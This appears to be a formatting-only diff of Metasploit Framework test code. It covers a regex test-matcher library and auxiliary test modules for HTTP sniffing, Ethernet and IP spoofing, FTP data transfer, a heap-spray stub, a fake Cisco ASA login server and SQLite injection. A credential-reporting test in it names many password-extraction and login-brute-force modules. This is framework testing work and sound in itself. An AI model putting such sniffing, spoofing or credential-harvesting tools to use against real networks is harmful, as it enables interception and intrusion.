return true if !@string
nil
end
def failure_message
"expected no failure to be found, but found this: '#{@string}'"
end
def negative_falure_message
"expected to find failures, but didn't find any :("
end
# alias :have_no_failures :contain_no_failures
end
def contain_no_failures_except(failures = [], exceptions = [])
ContainNoFailuresExcept.new(failures, exceptions)
end
end end
def contain_a_complete_test
ContainACompleteTest.new
end
class ContainAllSuccesses
def initialize(successes=[])
@successes = successes
@r = Regexr.new(true)
end
def matches?(data)
@data = data
@string = @r.find_strings_that_dont_exist_in_data(@data,@successes)
return true if !@string
nil
end
def failure_message
"expected all successes, but didn't find '#{@string}'"
end
def negative_failure_message
"expected to miss successes but found'm all :("
end
#alias :have_all_successes :contain_all_successes
end
def contain_all_successes(successes=[])
ContainAllSuccesses.new(successes)
end
class ContainNoFailuresExcept
def initialize(failures=[],exceptions=[])
@failures = failures
@exceptions = exceptions
@r = Regexr.new(true)
end
def matches?(data)
@data = data
@string = @r.find_strings_that_exist_in_data_except(@data,@failures,@exceptions)
return true if !@string
nil
end
def failure_message
"expected no failure to be found, but found this: '#{@string}'"
end
def negative_falure_message
"expected to find failures, but didn't find any :("
end
#alias :have_no_failures :contain_no_failures
end
def contain_no_failures_except(failures=[],exceptions=[])
ContainNoFailuresExcept.new(failures,exceptions)
end
end
end end

44
test/lib/regexr.rb
View File

@ -6,84 +6,80 @@
class Regexr class Regexr
def initialize(verbose=false, case_insensitive=true) def initialize(verbose = false, case_insensitive = true)
@verbose = verbose @verbose = verbose
@case_insensitive = case_insensitive @case_insensitive = case_insensitive
end end
# Check for the beginning and end lines. Handy when you need to ensure a log has started & completed # Check for the beginning and end lines. Handy when you need to ensure a log has started & completed
def verify_start_and_end(data,the_start,the_end) def verify_start_and_end(data, the_start, the_end)
return false unless data return false unless data
data_lines = data.split("\n") data_lines = data.split("\n")
regex_start = Regexp.new(the_start, @case_insensitive) regex_start = Regexp.new(the_start, @case_insensitive)
regex_end = Regexp.new(the_end, @case_insensitive) regex_end = Regexp.new(the_end, @case_insensitive)
if regex_start =~ data_lines.first if regex_start =~ data_lines.first
return regex_end =~ data_lines.last return regex_end =~ data_lines.last
end end
return false return false
end end
# Scan for any number of success lines. In order to pass, all successes must match. # Scan for any number of success lines. In order to pass, all successes must match.
def find_strings_that_dont_exist_in_data(data,regexes=[]) def find_strings_that_dont_exist_in_data(data, regexes = [])
return false unless data return false unless data
data_lines = data.split("\n") data_lines = data.split("\n")
return nil unless regexes ## count as a pass return nil unless regexes ## count as a pass
if regexes if regexes
target_successes = regexes.size target_successes = regexes.size
success_count = 0 success_count = 0
regexes.each { |condition| regexes.each { |condition|
## assume we haven't got it ## assume we haven't got it
found = false found = false
re = Regexp.new(condition, @case_insensitive) re = Regexp.new(condition, @case_insensitive)
## for each of our data lines ## for each of our data lines
data_lines.each {|line| data_lines.each { |line|
## if it's a match ## if it's a match
if line =~ re if line =~ re
found = true found = true
break ## success! break ## success!
end end
} }
if !found if !found
return condition ## return this string, it wasn't found. return condition ## return this string, it wasn't found.
end end
} }
end end
nil ## got all successes, woot! nil ## got all successes, woot!
end end
# Scan for failures -- if any single failure matches, the test returns true. # Scan for failures -- if any single failure matches, the test returns true.
def find_strings_that_exist_in_data_except(data,regexes=[],exceptions=[]) def find_strings_that_exist_in_data_except(data, regexes = [], exceptions = [])
return false unless data return false unless data
data_lines = data.split("\n") data_lines = data.split("\n")
return nil unless regexes ## count as a pass return nil unless regexes ## count as a pass
regexes.each { |condition| regexes.each { |condition|
## for each failure condition that we've been passed
## for each failure condition that we've been passed
re = Regexp.new(condition, @case_insensitive) re = Regexp.new(condition, @case_insensitive)
## assume we're okay ## assume we're okay
found = false found = false
data_lines.each { |line| data_lines.each { |line|
if re =~ line if re =~ line
found = true # oh, we found a match found = true # oh, we found a match
# but let's check the exceptions # but let's check the exceptions
exceptions.map { |exception| exceptions.map { |exception|
reg_exception = Regexp.new(exception, @case_insensitive) reg_exception = Regexp.new(exception, @case_insensitive)
@ -95,12 +91,12 @@ class Regexr
end end
} }
# If we didn't find an exception, we have to fail it. do not pass go. # If we didn't find an exception, we have to fail it. do not pass go.
return condition if found return condition if found
end end
} }
} }
nil ## no failures found! nil ## no failures found!
end end
end end

27
test/modules/auxiliary/test/capture.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
@ -12,19 +10,17 @@ class MetasploitModule < Msf::Auxiliary
def initialize def initialize
super( super(
'Name' => 'Simple Network Capture Tester', 'Name' => 'Simple Network Capture Tester',
'Description' => 'This module sniffs HTTP GET requests from the network', 'Description' => 'This module sniffs HTTP GET requests from the network',
'Author' => 'hdm', 'Author' => 'hdm',
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Actions' => 'Actions' => [
[ [ 'Sniffer' ]
[ 'Sniffer' ] ],
], 'PassiveActions' => [
'PassiveActions' => 'Sniffer'
[ ],
'Sniffer' 'DefaultAction' => 'Sniffer'
],
'DefaultAction' => 'Sniffer'
) )
deregister_options('RHOST') deregister_options('RHOST')
@ -39,16 +35,15 @@ class MetasploitModule < Msf::Auxiliary
p = PacketFu::Packet.parse(pkt) p = PacketFu::Packet.parse(pkt)
next unless p.is_tcp? next unless p.is_tcp?
next if p.payload.empty? next if p.payload.empty?
if (p.payload =~ /GET\s+([^\s]+)\s+HTTP/smi) if (p.payload =~ /GET\s+([^\s]+)\s+HTTP/smi)
url = $1 url = $1
print_status("GET #{url}") print_status("GET #{url}")
break if url =~ /StopCapture/ break if url =~ /StopCapture/
end end
end end
close_pcap() close_pcap()
print_status("Finished sniffing") print_status("Finished sniffing")
end end
end end

25
test/modules/auxiliary/test/check.rb
View File

@ -3,33 +3,34 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => "Check Test", update_info(
'Description' => %q{ info,
'Name' => "Check Test",
'Description' => %q{
This module ensures that 'check' actually functions for Auxiilary modules. This module ensures that 'check' actually functions for Auxiilary modules.
}, },
'References' => 'References' => [
[
[ 'OSVDB', '0' ] [ 'OSVDB', '0' ]
], ],
'Author' => 'Author' => [
[
'todb' 'todb'
], ],
'License' => MSF_LICENSE 'License' => MSF_LICENSE
)) )
)
register_options( register_options(
[ [
Opt::RPORT(80) Opt::RPORT(80)
], self.class) ], self.class
)
end end
def check def check

17
test/modules/auxiliary/test/eth_spoof.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
@ -12,15 +10,14 @@ class MetasploitModule < Msf::Auxiliary
def initialize def initialize
super( super(
'Name' => 'Simple Ethernet Frame Spoofer', 'Name' => 'Simple Ethernet Frame Spoofer',
'Description' => 'This module sends spoofed ethernet frames', 'Description' => 'This module sends spoofed ethernet frames',
'Author' => 'hdm', 'Author' => 'hdm',
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Actions' => 'Actions' => [
[ [ 'Spoofer' ]
[ 'Spoofer' ] ],
], 'DefaultAction' => 'Spoofer'
'DefaultAction' => 'Spoofer'
) )
end end

29
test/modules/auxiliary/test/ftp_data.rb
View File

@ -3,29 +3,26 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp include Msf::Exploit::Remote::Ftp
def initialize def initialize
super( super(
'Name' => 'FTP Client Exploit Mixin DATA test Exploit', 'Name' => 'FTP Client Exploit Mixin DATA test Exploit',
'Description' => 'This module tests the "DATA" functionality of the ftp client exploit mixin.', 'Description' => 'This module tests the "DATA" functionality of the ftp client exploit mixin.',
'Author' => [ 'Thomas Ring', 'jduck' ], 'Author' => [ 'Thomas Ring', 'jduck' ],
'License' => MSF_LICENSE 'License' => MSF_LICENSE
) )
register_options( register_options(
[ [
OptString.new('UPLOADDIR', [ true, "The directory to use for the upload test", '/incoming' ]) OptString.new('UPLOADDIR', [ true, "The directory to use for the upload test", '/incoming' ])
] ]
) )
end end
def run def run
begin begin
if (not connect_login) if (not connect_login)
return return
@ -34,24 +31,24 @@ class MetasploitModule < Msf::Auxiliary
curdir = "" curdir = ""
# change to the upload directory # change to the upload directory
result = send_cmd( ["CWD", datastore['UPLOADDIR']], true ) result = send_cmd(["CWD", datastore['UPLOADDIR']], true)
print_status("CWD response: #{result.inspect}") print_status("CWD response: #{result.inspect}")
# find out what the server thinks this dir is # find out what the server thinks this dir is
result = send_cmd( ["PWD"], true ) result = send_cmd(["PWD"], true)
print_status("PWD response: #{result.inspect}") print_status("PWD response: #{result.inspect}")
if (result =~ /257\s\"(.+)\"/) if (result =~ /257\s\"(.+)\"/)
curdir = $1 curdir = $1
end end
curdir = "/" + curdir if curdir[0] != "/" curdir = "/" + curdir if curdir[0] != "/"
curdir << "/" if curdir[-1,1] != "/" curdir << "/" if curdir[-1, 1] != "/"
# generate some data to upload # generate some data to upload
data = Rex::Text.rand_text_alphanumeric(1024) data = Rex::Text.rand_text_alphanumeric(1024)
#print_status("data:\n" + Rex::Text.to_hex_dump(data)) # print_status("data:\n" + Rex::Text.to_hex_dump(data))
# test putting data # test putting data
result = send_cmd_data(["PUT", curdir+"test"], data, "I") result = send_cmd_data(["PUT", curdir + "test"], data, "I")
print_status("PUT response: #{result.inspect}") print_status("PUT response: #{result.inspect}")
# test fallthrough # test fallthrough
@ -63,7 +60,7 @@ class MetasploitModule < Msf::Auxiliary
print_status("LS response: #{result.inspect}") print_status("LS response: #{result.inspect}")
# test getting file # test getting file
result = send_cmd_data(["GET", curdir+"test"], "A") result = send_cmd_data(["GET", curdir + "test"], "A")
print_status("GET response: #{result[0].inspect}") print_status("GET response: #{result[0].inspect}")
# see if it matches # see if it matches
@ -74,13 +71,11 @@ class MetasploitModule < Msf::Auxiliary
end end
# adios # adios
result = send_cmd( ["QUIT"], true ) result = send_cmd(["QUIT"], true)
print_status("QUIT response: #{result.inspect}") print_status("QUIT response: #{result.inspect}")
ensure ensure
disconnect disconnect
end end
end end
end end

38
test/modules/auxiliary/test/heaplib2.rb
View File

@ -3,35 +3,35 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info={}) def initialize(info = {})
super(update_info(info, super(
'Name' => "Heaplib2 Test", update_info(
'Description' => %q{ info,
This tests heaplib2. Since it is a test module, it's not intended to do much useful work in the field. 'Name' => "Heaplib2 Test",
}, 'Description' => %q{
'License' => MSF_LICENSE, This tests heaplib2. Since it is a test module, it's not intended to do much useful work in the field.
'Author' => [ 'sinn3r' ], },
'References' => 'License' => MSF_LICENSE,
[ 'Author' => [ 'sinn3r' ],
'References' => [
[ 'URL', 'https://metasploit.com' ] [ 'URL', 'https://metasploit.com' ]
], ],
'Platform' => 'win', 'Platform' => 'win',
'Targets' => 'Targets' => [
[
[ 'Automatic', {} ] [ 'Automatic', {} ]
], ],
'Privileged' => false, 'Privileged' => false,
'DisclosureDate' => '2014-03-01', 'DisclosureDate' => '2014-03-01',
'DefaultTarget' => 0)) 'DefaultTarget' => 0
)
)
end end
def on_request_uri(cli, request) def on_request_uri(cli, request)
spray = %Q| spray = %Q|
function log(msg) { function log(msg) {
@ -71,7 +71,7 @@ class MetasploitModule < Msf::Auxiliary
| |
print_status("Sending html") print_status("Sending html")
send_response(cli, html, {'Content-Type'=>'text/html'}) send_response(cli, html, { 'Content-Type' => 'text/html' })
end end
def run def run

53
test/modules/auxiliary/test/httpserver.rb
View File

@ -3,46 +3,46 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HttpServer
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => 'Basic HttpServer Simulator', update_info(
'Description' => %q{ info,
This is example of a basic HttpServer simulator, good for PR scenarios when a module 'Name' => 'Basic HttpServer Simulator',
is made, but the author no longer has access to the test box, no pcap or screenshot - 'Description' => %q{
Basically no way to prove the functionality. This is example of a basic HttpServer simulator, good for PR scenarios when a module
is made, but the author no longer has access to the test box, no pcap or screenshot -
Basically no way to prove the functionality.
This particular simulator will pretend to act like a Cisco ASA ASDM, so the This particular simulator will pretend to act like a Cisco ASA ASDM, so the
cisco_asa_asdm.rb module can do a live test against it. cisco_asa_asdm.rb module can do a live test against it.
}, },
'References' => 'References' => [
[
[ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2720' ], [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2720' ],
], ],
'DefaultOptions' => 'DefaultOptions' => {
{
'SRVPORT' => 443, 'SRVPORT' => 443,
'SSL' => true, 'SSL' => true,
'URIPATH' => '/' 'URIPATH' => '/'
}, },
'Author' => [ 'sinn3r' ], 'Author' => [ 'sinn3r' ],
'License' => MSF_LICENSE 'License' => MSF_LICENSE
)) )
)
register_options( register_options(
[ [
OptString.new('USERNAME', [true, "The valid default username", "cisco"]), OptString.new('USERNAME', [true, "The valid default username", "cisco"]),
OptString.new('PASSWORD', [true, "The valid default password", "cisco"]) OptString.new('PASSWORD', [true, "The valid default password", "cisco"])
], self.class) ], self.class
)
deregister_options('RHOST') deregister_options('RHOST')
end end
# #
# Returns a response when the client is trying to check the connection # Returns a response when the client is trying to check the connection
# #
@ -50,7 +50,6 @@ class MetasploitModule < Msf::Auxiliary
send_response(cli, '') send_response(cli, '')
end end
# #
# Returns a response when the client is trying to authenticate # Returns a response when the client is trying to authenticate
# #
@ -59,7 +58,7 @@ class MetasploitModule < Msf::Auxiliary
when 'GET' when 'GET'
# This must be the is_app_asdm? method asking # This must be the is_app_asdm? method asking
print_status("Responding to the is_app_asdm? method") print_status("Responding to the is_app_asdm? method")
send_response(cli, '', {'Set-Cookie'=>'webvpn'}) send_response(cli, '', { 'Set-Cookie' => 'webvpn' })
when 'POST' when 'POST'
# This must be the do_login method. But before it can login, it must meet # This must be the do_login method. But before it can login, it must meet
@ -97,22 +96,20 @@ class MetasploitModule < Msf::Auxiliary
end end
end end
def on_request_uri(cli, req) def on_request_uri(cli, req)
print_status("Received request: #{req.uri}") print_status("Received request: #{req.uri}")
case req.uri case req.uri
when '/' when '/'
res_check_conn(cli, req) res_check_conn(cli, req)
when /\+webvpn\+\/index\.html/ when /\+webvpn\+\/index\.html/
res_login(cli, req) res_login(cli, req)
end end
# Request not processed, send a 404 # Request not processed, send a 404
send_not_found(cli) send_not_found(cli)
end end
def run def run
exploit exploit
end end

18
test/modules/auxiliary/test/ip_spoof.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Capture include Msf::Exploit::Capture
@ -12,10 +10,10 @@ class MetasploitModule < Msf::Auxiliary
def initialize def initialize
super( super(
'Name' => 'Simple IP Spoofing Tester', 'Name' => 'Simple IP Spoofing Tester',
'Description' => 'Simple IP Spoofing Tester', 'Description' => 'Simple IP Spoofing Tester',
'Author' => 'hdm', 'Author' => 'hdm',
'License' => MSF_LICENSE 'License' => MSF_LICENSE
) )
begin begin
@ -25,8 +23,7 @@ class MetasploitModule < Msf::Auxiliary
@@havepcap = false @@havepcap = false
end end
deregister_options('FILTER','PCAPFILE') deregister_options('FILTER', 'PCAPFILE')
end end
def run_host(ip) def run_host(ip)
@ -37,9 +34,9 @@ class MetasploitModule < Msf::Auxiliary
p.ip_ttl = 255 p.ip_ttl = 255
p.udp_sport = 53 p.udp_sport = 53
p.udp_dport = 53 p.udp_dport = 53
p.payload = "HELLO WORLD" p.payload = "HELLO WORLD"
p.recalc p.recalc
ret = send(ip,p) ret = send(ip, p)
if ret == :done if ret == :done
print_good("#{ip}: Sent a packet to #{ip} from #{ip}") print_good("#{ip}: Sent a packet to #{ip} from #{ip}")
else else
@ -48,7 +45,7 @@ class MetasploitModule < Msf::Auxiliary
close_pcap close_pcap
end end
def send(ip,pkt) def send(ip, pkt)
begin begin
capture_sendto(pkt, ip) capture_sendto(pkt, ip)
rescue RuntimeError => e rescue RuntimeError => e
@ -57,5 +54,4 @@ class MetasploitModule < Msf::Auxiliary
return :done return :done
end end
end end

30
test/modules/auxiliary/test/recon_passive.rb
View File

@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
@ -12,26 +10,24 @@ class MetasploitModule < Msf::Auxiliary
def initialize def initialize
super( super(
'Name' => 'Simple Recon Module Tester', 'Name' => 'Simple Recon Module Tester',
'Description' => 'Simple Recon Module Tester', 'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm', 'Author' => 'hdm',
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Actions' => 'Actions' => [
[ ['Continuous Port Sweep']
['Continuous Port Sweep'] ],
], 'PassiveActions' => [
'PassiveActions' => 'Continuous Port Sweep'
[ ]
'Continuous Port Sweep'
]
) )
register_options( register_options(
[ [
Opt::RHOST, Opt::RHOST,
Opt::RPORT, Opt::RPORT,
], self.class) ], self.class
)
end end
def run def run
@ -54,8 +50,8 @@ class MetasploitModule < Msf::Auxiliary
disconnect disconnect
report_host(:host => datastore['RHOST']) report_host(:host => datastore['RHOST'])
report_service( report_service(
:host => datastore['RHOST'], :host => datastore['RHOST'],
:port => datastore['RPORT'], :port => datastore['RPORT'],
:proto => 'tcp' :proto => 'tcp'
) )
rescue ::Exception => e rescue ::Exception => e

57
test/modules/auxiliary/test/report_auth_info.rb
View File

@ -3,24 +3,26 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
FAKE_IP = '192.168.12.123' FAKE_IP = '192.168.12.123'
FAKE_PORT = 80 FAKE_PORT = 80
FAKE_USER = 'user' FAKE_USER = 'user'
FAKE_PASS = 'password' FAKE_PASS = 'password'
FAKE_PROOF = 'proof' FAKE_PROOF = 'proof'
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => "report_cred Test", update_info(
'Description' => %q{ info,
This module will test every auxiliary module's report_cred method 'Name' => "report_cred Test",
}, 'Description' => %q{
'Author' => [ 'sinn3r' ], This module will test every auxiliary module's report_cred method
'License' => MSF_LICENSE },
)) 'Author' => [ 'sinn3r' ],
'License' => MSF_LICENSE
)
)
end end
def test_novell_mdm_creds def test_novell_mdm_creds
@ -135,7 +137,7 @@ class MetasploitModule < Msf::Auxiliary
def test_dlink_dsl320b_password_extractor def test_dlink_dsl320b_password_extractor
mod = framework.auxiliary.create('admin/http/dlink_dsl320b_password_extractor') mod = framework.auxiliary.create('admin/http/dlink_dsl320b_password_extractor')
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF ) mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
end end
def test_nexpose_xxe_file_read def test_nexpose_xxe_file_read
@ -165,7 +167,7 @@ class MetasploitModule < Msf::Auxiliary
def test_vnc def test_vnc
mod = framework.auxiliary.create('server/capture/vnc') mod = framework.auxiliary.create('server/capture/vnc')
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'vnc_client', user: '', password: FAKE_PASS, proof: FAKE_PROOF ) mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'vnc_client', user: '', password: FAKE_PASS, proof: FAKE_PROOF)
end end
def test_smtp def test_smtp
@ -175,12 +177,12 @@ class MetasploitModule < Msf::Auxiliary
def test_sip def test_sip
mod = framework.auxiliary.create('server/capture/sip') mod = framework.auxiliary.create('server/capture/sip')
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'sip_client', user:FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF) mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'sip_client', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
end end
def test_oracle_login def test_oracle_login
mod = framework.auxiliary.create('admin/oracle/oracle_login') mod = framework.auxiliary.create('admin/oracle/oracle_login')
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'oracle', user: FAKE_USER, password: FAKE_PASS ) mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'oracle', user: FAKE_USER, password: FAKE_PASS)
end end
def test_postgresql def test_postgresql
@ -190,12 +192,12 @@ class MetasploitModule < Msf::Auxiliary
def test_pop3 def test_pop3
mod = framework.auxiliary.create('server/capture/pop3') mod = framework.auxiliary.create('server/capture/pop3')
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'pop3', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF ) mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'pop3', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
end end
def test_http_basic def test_http_basic
mod = framework.auxiliary.create('server/capture/http_basic') mod = framework.auxiliary.create('server/capture/http_basic')
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'HTTP', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF ) mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'HTTP', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
end end
def test_ftp def test_ftp
@ -245,7 +247,7 @@ class MetasploitModule < Msf::Auxiliary
def test_msf_rpc_login def test_msf_rpc_login
mod = framework.auxiliary.create('scanner/msf/msf_rpc_login') mod = framework.auxiliary.create('scanner/msf/msf_rpc_login')
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'msf-rpc', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF ) mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'msf-rpc', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
end end
def test_mongodb_login def test_mongodb_login
@ -285,7 +287,7 @@ class MetasploitModule < Msf::Auxiliary
def test_sevone_enum def test_sevone_enum
mod = framework.auxiliary.create('scanner/http/sevone_enum') mod = framework.auxiliary.create('scanner/http/sevone_enum')
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: '') mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: '')
end end
def test_sentry_cdu_enum def test_sentry_cdu_enum
@ -305,7 +307,7 @@ class MetasploitModule < Msf::Auxiliary
def test_rfcode_reader_enum def test_rfcode_reader_enum
mod = framework.auxiliary.create('scanner/http/rfcode_reader_enum') mod = framework.auxiliary.create('scanner/http/rfcode_reader_enum')
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'RFCode Reader', user: FAKE_USER, password:FAKE_PASS, proof: FAKE_PROOF) mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'RFCode Reader', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
end end
def test_radware_appdictor_enum def test_radware_appdictor_enum
@ -376,7 +378,7 @@ class MetasploitModule < Msf::Auxiliary
def test_vbulletin_vote_sqli_exec def test_vbulletin_vote_sqli_exec
mod = framework.exploits.create('unix/webapp/vbulletin_vote_sqli_exec') mod = framework.exploits.create('unix/webapp/vbulletin_vote_sqli_exec')
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF) mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'http', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
end end
def test_sap_mgmt_con_brute_login def test_sap_mgmt_con_brute_login
@ -450,8 +452,8 @@ class MetasploitModule < Msf::Auxiliary
end end
def test_d20pass def test_d20pass
mod = framework.auxiliary.create('gather/d20pass') mod = framework.auxiliary.create('gather/d20pass')
mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'hp', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF) mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, service_name: 'hp', user: FAKE_USER, password: FAKE_PASS, proof: FAKE_PROOF)
end end
def test_doliwamp_traversal_creds def test_doliwamp_traversal_creds
@ -480,11 +482,12 @@ class MetasploitModule < Msf::Auxiliary
end end
def run def run
counter_all = 0 counter_all = 0
counter_good = 0 counter_good = 0
counter_bad = 0 counter_bad = 0
self.methods.each do |m| self.methods.each do |m|
next if m.to_s !~ /^test_.+/ next if m.to_s !~ /^test_.+/
print_status("Trying: ##{m.to_s}") print_status("Trying: ##{m.to_s}")
begin begin
self.send(m) self.send(m)
@ -492,7 +495,7 @@ class MetasploitModule < Msf::Auxiliary
counter_good += 1 counter_good += 1
rescue ::Exception => e rescue ::Exception => e
print_error("That blew up :-(") print_error("That blew up :-(")
print_line("#{e.class} #{e.message}\n#{e.backtrace*"\n"}") print_line("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
counter_bad += 1 counter_bad += 1
ensure ensure
print_line print_line

12
test/modules/auxiliary/test/scanner_batch.rb
View File

@ -3,25 +3,23 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner include Msf::Auxiliary::Scanner
def initialize def initialize
super( super(
'Name' => 'Simple Recon Module Tester', 'Name' => 'Simple Recon Module Tester',
'Description' => 'Simple Recon Module Tester', 'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm', 'Author' => 'hdm',
'License' => MSF_LICENSE 'License' => MSF_LICENSE
) )
register_options( register_options(
[ [
Opt::RPORT, Opt::RPORT,
], self.class) ], self.class
)
end end
def run_batch_size def run_batch_size

12
test/modules/auxiliary/test/scanner_host.rb
View File

@ -3,25 +3,23 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner include Msf::Auxiliary::Scanner
def initialize def initialize
super( super(
'Name' => 'Simple Recon Module Tester', 'Name' => 'Simple Recon Module Tester',
'Description' => 'Simple Recon Module Tester', 'Description' => 'Simple Recon Module Tester',
'Author' => 'hdm', 'Author' => 'hdm',
'License' => MSF_LICENSE 'License' => MSF_LICENSE
) )
register_options( register_options(
[ [
Opt::RPORT, Opt::RPORT,
], self.class) ], self.class
)
end end
def run_host(ip) def run_host(ip)

27
test/modules/auxiliary/test/space_check.rb
View File

@ -3,33 +3,34 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(
'Name' => "Check Test", update_info(
'Description' => %q{ info,
This module ensures that 'check' actually functions for Auxiilary modules. 'Name' => "Check Test",
}, 'Description' => %q{
'References' => This module ensures that 'check' actually functions for Auxiilary modules.
[ },
'References' => [
[ 'OSVDB', '0' ] [ 'OSVDB', '0' ]
], ],
'Author' => 'Author' => [
[
'todb' 'todb'
], ],
'License' => MSF_LICENSE 'License' => MSF_LICENSE
)) )
)
register_options( register_options(
[ [
Opt::RPORT(80) Opt::RPORT(80)
], self.class) ], self.class
)
end end
def check def check

86
test/modules/auxiliary/test/sqlite_lab.rb
View File

@ -8,18 +8,16 @@ class MetasploitModule < Msf::Auxiliary
update_info( update_info(
info, info,
'Name' => 'SQLite injection testing module', 'Name' => 'SQLite injection testing module',
'Description' => ' 'Description' => %q{
This module tests the SQL injection library against the SQLite database management system This module tests the SQL injection library against the SQLite database management system
The target : https://github.com/incredibleindishell/sqlite-lab The target : https://github.com/incredibleindishell/sqlite-lab
', },
'Author' => 'Author' => [
[ 'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>'
'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' ],
],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Platform' => %w[linux], 'Platform' => %w[linux],
'References' => 'References' => [],
[],
'Targets' => [['Wildcard Target', {}]], 'Targets' => [['Wildcard Target', {}]],
'DefaultTarget' => 0 'DefaultTarget' => 0
) )
